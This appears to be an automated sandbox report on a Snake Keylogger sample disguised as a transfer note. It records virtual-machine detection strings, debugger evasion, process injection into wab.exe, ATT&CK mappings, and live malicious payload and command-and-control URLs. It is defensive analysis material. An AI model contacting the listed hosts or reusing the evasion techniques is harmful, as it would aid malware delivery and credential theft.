Source: Amcache.hve.18.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wab.exe, 0000000E.00000002.1925821576.00000000065FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.18.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.18.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.18.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.18.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8]`
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.18.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.18.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.18.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.18.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.18.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.18.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.18.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	API call chain: ExitProcess graph end node			graph_0-3516
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	API call chain: ExitProcess graph end node			graph_0-3515

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_02E7D6E0 LdrInitializeThunk,LdrInitializeThunk,

2_2_02E7D6E0

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F2FF7C			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	115 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Confirmation transfer Note AGS # 22-00379.exe	50%	ReversingLabs	Win32.Trojan.Generic
Confirmation transfer Note AGS # 22-00379.exe	58%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	58%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.reap.skyestates.com.mt	0%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	malware
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://checkip.dyndns.comd	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
http://checkip.dyndns.orgd	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	12%	Virustotal		Browse
http://crl.microw	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://anotherarmy.dns.army:8081	15%	Virustotal		Browse
https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin	3%	Virustotal		Browse
http://varders.kozow.com:8081	15%	Virustotal		Browse
https://www.reap.skyestates.com.mt/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.reap.skyestates.com.mt	108.167.181.251	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aborters.duckdns.org:8081	wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.comd	wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.orgd	wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reap.skyestates.com.mt/	wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.18.dr	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.000000002201C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microw	powershell.exe, 00000002.00000002.1630220347.000000000754A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.167.181.251	www.reap.skyestates.com.mt	United States		46606	UNIFIEDLAYER-AS-1US	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481030
Start date and time:	2024-07-25 03:08:48 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Confirmation transfer Note AGS # 22-00379.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/16@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 89% Number of executed functions: 89 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 424 because it is empty
Execution Graph export aborted for target wab.exe, PID 7476 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:09:42	API Interceptor	40x Sleep call for process: powershell.exe modified
23:07:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.167.181.251	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse
	odemePlani.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse
	#91139_C050.exe	Get hash	malicious	Azorult, GuLoader	Browse
	BSX#24001602.exe	Get hash	malicious	Azorult, GuLoader	Browse
158.101.44.242	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	KQtHehIECg.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Bank Slip.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.247.73
www.reap.skyestates.com.mt	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	108.167.181.251
	odemePlani.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	#91139_C050.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	BSX#24001602.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	https://mail.tekdecoracoes.com.br/don/upload/en.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4	Get hash	malicious	Unknown	Browse	162.241.63.57
	http://links-sg.dispatch.me/ls/click?upn=u001.ocQe0-2BgliqpF-2FIgZypM8KOaLflKjBlvqTxtPZw5yZIbZDE9vmulRwrCjHKmWRDNHjHXGC5bjX16p-2FKQbudETcReyH2ada0TDTZ9i4Fm9kQ3GWUyvzzwMCdcEUqs-2FTSCobKxgzuisHVBsQ-2FSQ3F13H5HutCQALtWrS8HApt5o4dpZ-2BNvuOuxFwx-2BeObsn6VjvT5TqPLkexi4iH5KEJi8Cdw-3D-3DATrr_-2F-2F-2B-2FxnH7VwZ7l1bJN-2FhVOPk1U24fPXiT0lCeCqmBBxzunHzzBZhASjEPhdfcYmgfhvKPgbmfCcNO0asuCAP4GQjxIDFltQt0zztHT0pZkzXqKtFgdxgdlGrzT0WJ21THn3P5UyhAiKGRx3slicqJyrWBw4wmTjosxdLpPvzT9mOZ9tFtj-2FYpdJbLEVcqfFG3PWdvMJHnhRGcQ-2BjkZifTwg-3D-3D	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	108.179.241.225
	Transaction record 5445-97660.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	69.49.245.172
	Transaction record 5445-97660.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	69.49.245.172
	7Y18r(143).exe	Get hash	malicious	Upatre	Browse	50.87.60.178
	securedoc_20240724T165428.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	69.49.245.172
